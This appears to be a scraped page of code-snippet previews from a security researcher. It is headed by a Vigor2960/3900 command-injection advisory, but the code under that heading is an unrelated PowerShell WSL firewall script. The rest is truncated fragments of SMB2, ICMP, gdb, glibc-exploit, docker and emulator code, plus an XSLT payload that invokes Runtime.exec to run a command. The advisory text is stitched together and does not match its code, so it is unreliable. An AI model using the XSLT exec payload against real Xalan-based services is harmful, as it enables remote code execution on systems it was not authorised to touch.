Vigor2960 fw1.5.1.1RC3 (r8167) Vigor3900 fw1.5.1.1beta_r8167
There are several command injection vulnerabilities in the mainfunction.cgi file. The details are as follows:
1. In the downlaod_ovpn function
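# Script parameters. Only their names and defaults are visible in this excerpt;
# how $port, $op and $protocol are consumed is outside it.
# NOTE(review): if they are later interpolated into a command string, validate
# them first (e.g. cast $port to [int]) rather than passing them to Invoke-Expression.
param(
    $port,
    $op = 'open',
    $protocol = 'tcp'
)

# Remove Firewall Exception Rules
#
# Deletes every firewall rule whose display name matches
# 'WSL 2 Firewall Unlock *' and then resets the portproxy configuration.
#
# NOTE: `netsh interface portproxy reset` clears ALL portproxy entries on the
# host, not only the ones this script may have created. Both commands change
# system-wide network state and need an elevated session.
#
# Both commands are fixed strings, so they are invoked directly. Routing them
# through Invoke-Expression adds nothing here and makes the code parse a string
# as PowerShell, which becomes an injection risk as soon as a parameter is
# interpolated into it.
Function removeFirewall() {
    Remove-NetFirewallRule -DisplayName 'WSL 2 Firewall Unlock *'
    netsh interface portproxy reset
}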
# author: @leommxj @swing | |
import socket, struct, sys, time | |
from functools import reduce | |
class Smb2Header: | |
def __init__(self, command, message_id): | |
self.protocol_id = "\xfeSMB" | |
self.structure_size = "\x40\x00" # Must be set to 0x40 | |
self.credit_charge = "\x00"*2 |
#!/usr/bin/python3 | |
# -*- coding: utf-8 -*- | |
#author:swing | |
from scapy.all import * | |
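# ICMP type values for the sync request / response pair (per the constant names).
# 0xa5 / 0xa6 (165 / 166) are in the range IANA lists as unassigned, so packets
# carrying them are non-standard ICMP and stand out in a capture or a filter
# rule. NOTE(review): confirm which implementation defines these types.
ICMP_MS_SYNC_REQ_TYPE = 0xa5
ICMP_MS_SYNC_RSP_TYPE = 0xa6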
def keep_icmp_handler(func): |
from scapy.all import * | |
from scapy.layers.http import * | |
import gdb | |
class ShowProcto(gdb.Command): | |
""" | |
Usage: xpr/size memaddr procto_type | |
Exaple: | |
(gdb) xpr/20 0x7fffffffe238 TCP |
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <unistd.h> | |
#include <string.h> | |
/* | |
author: swing @ bestswngs@gmail.com | |
swpwn-pd@ubuntu:~/glibc-2.31$ uname -a | |
Linux ubuntu 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux | |
swpwn-pd@ubuntu:~/glibc-2.31$ cat /etc/issue |
/* INSTALL: | |
* | |
* Put this file under the respective directory. | |
* Windows: %APPDATA%\Hex-Rays\IDA Pro\themes\monokai\theme.css | |
* Linux & MacOS: ~/.idapro/themes/monokai/theme.css | |
* | |
* In Options -> Colors change theme to monokai | |
* | |
* */ | |
@importtheme "dark"; |
#!/usr/bin/env python3 | |
import docker | |
import os | |
import platform | |
import logging | |
import argparse | |
from distutils.dir_util import mkpath | |
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
<xsl:template> | |
<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
<!-- #114 Utf8: open -a calculator --> | |
<!-- #115 String: touch /tmp/pwn --> | |
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
<!-- #132 Utf8: <init> --> | |
<AAA select="<init>"/> |
import magic | |
import r2pipe | |
import hashlib | |
import argparse | |
import subprocess | |
from unicorn import * | |
from unicorn.x86_const import * | |
# from udbserver import * # uncomment this line if you want to debug | |
def pad_size(size): |